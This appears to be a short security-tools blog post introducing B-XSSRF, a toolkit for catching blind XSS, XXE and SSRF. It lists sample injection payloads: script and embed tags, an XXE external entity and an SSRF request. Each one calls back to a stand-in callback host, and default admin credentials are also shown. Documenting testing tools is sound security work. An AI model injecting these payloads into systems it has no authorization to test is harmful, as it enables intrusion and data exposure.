B-XSSRF is a toolkit to detect and keep track on Blind XSS, XXE & SSRF.
Read More – RedHunt OS : Virtual Machine for Adversary Emulation & Threat Hunting
SETUP
BLIND XSS
<embed src=”http://mysite.com/bxssrf/request.php”>
<script src=”http://mysite.com/bxssrf/request.php”>
BLIND XXE
<?xml version=”1.0″ ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM “http://mysite.com/bxssrf/request.php”> %ext;
]>
<r>
SSRF
GET /testssrf.php=http://mysite.com/bxssrf/request.php
USER : admin@test.com
PASS : 123456
How Does a Firewall Work Step by Step? What Is a Firewall and How Does…
ROADTools is a powerful framework designed for exploring and interacting with Microsoft Azure Active Directory…
Microsoft 365 Groups (also known as M365 Groups or Unified Groups) are at the heart…
SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…
PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…
HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…